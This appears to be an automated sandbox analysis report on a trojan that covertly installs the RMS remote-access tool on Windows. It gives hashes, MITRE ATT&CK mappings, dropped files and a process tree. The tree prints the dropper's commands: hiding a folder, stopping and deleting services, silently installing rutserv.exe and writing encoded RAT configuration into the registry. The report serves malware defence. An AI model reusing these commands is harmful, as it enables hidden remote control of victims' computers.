rms | 7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1

Analysis

max time kernel
169s
max time network
171s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2022 01:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe
Size

4.1MB
MD5

5667aae6c34c2aed84dc344f2f7594ce
SHA1

858632f13d298ecb49c8b50bc3fd1e56c6b3ad33
SHA256

7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1
SHA512

bff05864a430f2abdc78991a322d0ea686c24d6fc60ec8ef71aa422e484ee40b19991ef4f3ce70a7d64567fb804de2b8e16c8d6a3d4246ebc4f51f00ccf9f78a
SSDEEP

98304:1joLchbHlbSEmlKVr8+loohgLijiAJdTvJbl:1Schk7u4+lJRhvJB

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 8 IoCs

pid	Process
4808	data.exe
4568	rutserv.exe
4320	rutserv.exe
2084	rutserv.exe
1844	rutserv.exe
3468	rfusclient.exe
1484	rfusclient.exe
812	rfusclient.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1608	attrib.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 25 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1796-132-0x0000000000400000-0x000000000042B000-memory.dmp	upx
behavioral2/memory/1796-137-0x0000000000400000-0x000000000042B000-memory.dmp	upx
behavioral2/files/0x0007000000022e2f-150.dat	upx
behavioral2/files/0x0008000000022e30-151.dat	upx
behavioral2/files/0x0006000000022e50-159.dat	upx
behavioral2/files/0x0006000000022e50-160.dat	upx
behavioral2/memory/4568-161-0x0000000000400000-0x0000000000ABF000-memory.dmp	upx
behavioral2/memory/4568-162-0x0000000000400000-0x0000000000ABF000-memory.dmp	upx
behavioral2/files/0x0006000000022e50-164.dat	upx
behavioral2/memory/4320-165-0x0000000000400000-0x0000000000ABF000-memory.dmp	upx
behavioral2/files/0x0006000000022e50-174.dat	upx
behavioral2/files/0x0006000000022e50-175.dat	upx
behavioral2/files/0x0006000000022e4f-181.dat	upx
behavioral2/files/0x0006000000022e4f-184.dat	upx
behavioral2/files/0x0006000000022e4f-185.dat	upx
behavioral2/memory/2084-186-0x0000000000400000-0x0000000000ABF000-memory.dmp	upx
behavioral2/memory/1844-187-0x0000000000400000-0x0000000000ABF000-memory.dmp	upx
behavioral2/memory/1484-188-0x0000000000400000-0x00000000009DD000-memory.dmp	upx
behavioral2/memory/2084-189-0x0000000000400000-0x0000000000ABF000-memory.dmp	upx
behavioral2/memory/1844-190-0x0000000000400000-0x0000000000ABF000-memory.dmp	upx
behavioral2/memory/1484-191-0x0000000000400000-0x00000000009DD000-memory.dmp	upx
behavioral2/memory/3468-192-0x0000000000400000-0x00000000009DD000-memory.dmp	upx
behavioral2/files/0x0006000000022e4f-194.dat	upx
behavioral2/memory/812-195-0x0000000000400000-0x00000000009DD000-memory.dmp	upx
behavioral2/memory/812-196-0x0000000000400000-0x00000000009DD000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	data.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000022e2d-134.dat	autoit_exe
behavioral2/files/0x0007000000022e2d-135.dat	autoit_exe
behavioral2/files/0x0007000000022e2e-149.dat	autoit_exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp	cmd.exe
File created	C:\Windows\spom\aria-debug-4640.log	cmd.exe
File created	C:\Windows\spom\GBQHURCC-20220812-1921a.log	cmd.exe
File created	C:\Windows\spom\wct8E36.tmp	cmd.exe
File created	C:\Windows\spom\webmvorbisdecoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI4F4B.txt	cmd.exe
File opened for modification	C:\Windows\spom\GBQHURCC-20220812-1921.log	cmd.exe
File opened for modification	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\vp8decoder.dll	cmd.exe
File created	C:\Windows\spom\webmmux.dll	cmd.exe
File opened for modification	C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File opened for modification	C:\Windows\spom	attrib.exe
File opened for modification	C:\Windows\spom\uac.cmd	cmd.exe
File created	C:\Windows\spom\vp8encoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\vp8encoder.dll	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\chrome_installer.log	cmd.exe
File created	C:\Windows\spom\GBQHURCC-20220812-1921.log	cmd.exe
File opened for modification	C:\Windows\spom\msedge_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\wct8E36.tmp	cmd.exe
File opened for modification	C:\Windows\spom\GBQHURCC-20220812-1921a.log	cmd.exe
File opened for modification	C:\Windows\spom\hide.exe	cmd.exe
File opened for modification	C:\Windows\spom\vp8decoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\wmsetup.log	cmd.exe
File opened for modification	C:\Windows\spom\jawshtml.html	cmd.exe
File opened for modification	C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp	cmd.exe
File created	C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp	cmd.exe
File opened for modification	C:\Windows\spom\AdobeSFX.log	cmd.exe
File created	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistMSI4F1D.txt	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistMSI4F4B.txt	cmd.exe
File created	C:\Windows\spom\jawshtml.html	cmd.exe
File opened for modification	C:\Windows\spom\rfusclient.exe	cmd.exe
File opened for modification	C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp	cmd.exe
File created	C:\Windows\spom\msedge_installer.log	cmd.exe
File created	C:\Windows\spom\nouac.cmd	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\webmvorbisencoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\webmvorbisencoder.dll	cmd.exe
File created	C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp	cmd.exe
File opened for modification	C:\Windows\spom\BroadcastMsg_1660332030.txt	cmd.exe
File created	C:\Windows\spom\data.exe	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI4F4B.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI4F1D.txt	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistUI4F1D.txt	cmd.exe
File opened for modification	C:\Windows\spom\rutserv.exe	cmd.exe
File created	C:\Windows\spom\BroadcastMsg_1660332030.txt	cmd.exe
File created	C:\Windows\spom\wct399A.tmp	cmd.exe
File opened for modification	C:\Windows\spom\wct399A.tmp	cmd.exe
File opened for modification	C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp	cmd.exe
File created	C:\Windows\spom\AdobeSFX.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI4F1D.txt	cmd.exe
File opened for modification	C:\Windows\spom\wctC61E.tmp	cmd.exe
File opened for modification	C:\Windows\spom\webmmux.dll	cmd.exe
File opened for modification	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_191538705.html	cmd.exe
File opened for modification	C:\Windows\spom\wct4E2A.tmp	cmd.exe
File created	C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp	cmd.exe
File created	C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistUI4F4B.txt	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File opened for modification	C:\Windows\spom\wct1510.tmp	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1732	sc.exe
2044	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4568	rutserv.exe
4568	rutserv.exe
4568	rutserv.exe
4568	rutserv.exe
4568	rutserv.exe
4568	rutserv.exe
4320	rutserv.exe
4320	rutserv.exe
2084	rutserv.exe
2084	rutserv.exe
1844	rutserv.exe
1844	rutserv.exe
1844	rutserv.exe
1844	rutserv.exe
1844	rutserv.exe
1844	rutserv.exe
3468	rfusclient.exe
3468	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
812	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4568	rutserv.exe
Token: SeDebugPrivilege	2084	rutserv.exe
Token: SeTakeOwnershipPrivilege	1844	rutserv.exe
Token: SeTcbPrivilege	1844	rutserv.exe
Token: SeTcbPrivilege	1844	rutserv.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4808	data.exe
4808	data.exe
4808	data.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4808	data.exe
4808	data.exe
4808	data.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4568	rutserv.exe
4320	rutserv.exe
2084	rutserv.exe
1844	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 4808	1796	7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe	80
PID 1796 wrote to memory of 4808	1796	7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe	80
PID 1796 wrote to memory of 4808	1796	7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe	80
PID 1796 wrote to memory of 5032	1796	7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe	81
PID 1796 wrote to memory of 5032	1796	7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe	81
PID 1796 wrote to memory of 5032	1796	7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe	81
PID 4808 wrote to memory of 552	4808	data.exe	83
PID 4808 wrote to memory of 552	4808	data.exe	83
PID 4808 wrote to memory of 552	4808	data.exe	83
PID 552 wrote to memory of 3160	552	cmd.exe	85
PID 552 wrote to memory of 3160	552	cmd.exe	85
PID 552 wrote to memory of 3160	552	cmd.exe	85
PID 3160 wrote to memory of 1372	3160	net.exe	86
PID 3160 wrote to memory of 1372	3160	net.exe	86
PID 3160 wrote to memory of 1372	3160	net.exe	86
PID 552 wrote to memory of 3064	552	cmd.exe	87
PID 552 wrote to memory of 3064	552	cmd.exe	87
PID 552 wrote to memory of 3064	552	cmd.exe	87
PID 3064 wrote to memory of 1612	3064	net.exe	88
PID 3064 wrote to memory of 1612	3064	net.exe	88
PID 3064 wrote to memory of 1612	3064	net.exe	88
PID 552 wrote to memory of 1732	552	cmd.exe	89
PID 552 wrote to memory of 1732	552	cmd.exe	89
PID 552 wrote to memory of 1732	552	cmd.exe	89
PID 552 wrote to memory of 2044	552	cmd.exe	90
PID 552 wrote to memory of 2044	552	cmd.exe	90
PID 552 wrote to memory of 2044	552	cmd.exe	90
PID 552 wrote to memory of 2008	552	cmd.exe	91
PID 552 wrote to memory of 2008	552	cmd.exe	91
PID 552 wrote to memory of 2008	552	cmd.exe	91
PID 552 wrote to memory of 1608	552	cmd.exe	92
PID 552 wrote to memory of 1608	552	cmd.exe	92
PID 552 wrote to memory of 1608	552	cmd.exe	92
PID 552 wrote to memory of 4568	552	cmd.exe	93
PID 552 wrote to memory of 4568	552	cmd.exe	93
PID 552 wrote to memory of 4568	552	cmd.exe	93
PID 552 wrote to memory of 4320	552	cmd.exe	94
PID 552 wrote to memory of 4320	552	cmd.exe	94
PID 552 wrote to memory of 4320	552	cmd.exe	94
PID 552 wrote to memory of 2320	552	cmd.exe	95
PID 552 wrote to memory of 2320	552	cmd.exe	95
PID 552 wrote to memory of 2320	552	cmd.exe	95
PID 552 wrote to memory of 4248	552	cmd.exe	96
PID 552 wrote to memory of 4248	552	cmd.exe	96
PID 552 wrote to memory of 4248	552	cmd.exe	96
PID 552 wrote to memory of 1684	552	cmd.exe	97
PID 552 wrote to memory of 1684	552	cmd.exe	97
PID 552 wrote to memory of 1684	552	cmd.exe	97
PID 552 wrote to memory of 3972	552	cmd.exe	98
PID 552 wrote to memory of 3972	552	cmd.exe	98
PID 552 wrote to memory of 3972	552	cmd.exe	98
PID 552 wrote to memory of 3528	552	cmd.exe	99
PID 552 wrote to memory of 3528	552	cmd.exe	99
PID 552 wrote to memory of 3528	552	cmd.exe	99
PID 552 wrote to memory of 4816	552	cmd.exe	100
PID 552 wrote to memory of 4816	552	cmd.exe	100
PID 552 wrote to memory of 4816	552	cmd.exe	100
PID 552 wrote to memory of 3792	552	cmd.exe	101
PID 552 wrote to memory of 3792	552	cmd.exe	101
PID 552 wrote to memory of 3792	552	cmd.exe	101
PID 552 wrote to memory of 2084	552	cmd.exe	102
PID 552 wrote to memory of 2084	552	cmd.exe	102
PID 552 wrote to memory of 2084	552	cmd.exe	102
PID 1844 wrote to memory of 3468	1844	rutserv.exe	107

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1608	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe
"C:\Users\Admin\AppData\Local\Temp\7405b46d5f93ea04e7ecd588ee4bd1de76579689e07986895bbbaeec4f2bf9e1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Users\Admin\AppData\Local\Temp\data.exe
  "C:\Users\Admin\AppData\Local\Temp\data.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nouac.cmd
    3⤵
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\Windows\SysWOW64\net.exe
      net stop netaservice
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3160
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop netaservice
        5⤵
        
        PID:1372
  - - C:\Windows\SysWOW64\net.exe
      net stop rmanservice
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3064
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop rmanservice
        5⤵
        
        PID:1612
  - - C:\Windows\SysWOW64\sc.exe
      sc delete netaservice
      4⤵
      Launches sc.exe
      PID:1732
  - - C:\Windows\SysWOW64\sc.exe
      sc delete rmanservice
      4⤵
      Launches sc.exe
      PID:2044
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
      4⤵
      PID:2008
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\Windows\spom"
      4⤵
      Sets file to hidden
      Drops file in Windows directory
      Views/modifies file attributes
      PID:1608
  - - C:\Windows\spom\rutserv.exe
      "rutserv.exe" /silentinstall
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4568
  - - C:\Windows\spom\rutserv.exe
      "rutserv.exe" /firewall
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:4320
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e006a006f0070007300300032004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00380044003100390045003000300044002d0037003400420034002d0034004400430041002d0042003000410034002d003200430035003900310043004100460035003500410038007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
      4⤵
      PID:4248
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
      4⤵
      PID:3972
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
      4⤵
      PID:3528
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"
      4⤵
      PID:4816
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
      4⤵
      PID:3792
  - - C:\Windows\spom\rutserv.exe
      "rutserv.exe" /start
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
  2⤵
  PID:5032

C:\Windows\spom\rutserv.exe
C:\Windows\spom\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1844
- C:\Windows\spom\rfusclient.exe
  C:\Windows\spom\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:1484
- C:\Windows\spom\rfusclient.exe
  C:\Windows\spom\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3468
- - C:\Windows\spom\rfusclient.exe
    C:\Windows\spom\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

Filesize
300B

MD5
74e9d0e8925604864a7a58fb140a51b9

SHA1
bbe1510e42b08cf99bda7a8572b55dd39d8f957e

SHA256
3f1c0618f490d511359ffe19807a052413e9b9e1e4507e8cd67c97a422ea3a3a

SHA512
72b0073fed4a43023cd47dfa86a7c0f43a73466d7ea6fa5a01075a98646b624d26f70143c7a589effe63efb8c479f361a6a5c7369fcffbe9a7c60fa96f7260fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe

Filesize
840KB

MD5
2ec95cf9e9057f26663af7ec267fc05c

SHA1
e05540a0c5992926e3759d2cd254b56dcbc7c0a1

SHA256
62c388d65bad2c02fabbbc2736609c212c383b5e2c8fd20cb91f684c38ea8445

SHA512
d6f2de5586c1c43c6a0d99d613382dc4bd2339ea64792077373de3541c16d2ef40237b75c538cf9680a3a69ec474356c8c659776ab21e4fbacbae660d09d2baa

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe

Filesize
840KB

MD5
2ec95cf9e9057f26663af7ec267fc05c

SHA1
e05540a0c5992926e3759d2cd254b56dcbc7c0a1

SHA256
62c388d65bad2c02fabbbc2736609c212c383b5e2c8fd20cb91f684c38ea8445

SHA512
d6f2de5586c1c43c6a0d99d613382dc4bd2339ea64792077373de3541c16d2ef40237b75c538cf9680a3a69ec474356c8c659776ab21e4fbacbae660d09d2baa

Download Submit
C:\Users\Admin\AppData\Local\Temp\hide.exe

Filesize
840KB

MD5
5e6bd9aca16e20f70a167c1425a44623

SHA1
a71234c6e9422e9869265045087825618e874d2d

SHA256
e7596512a273e6a5c54952c98ff8f7a1aff4c61d36e6dc02f97735e7bbf5b154

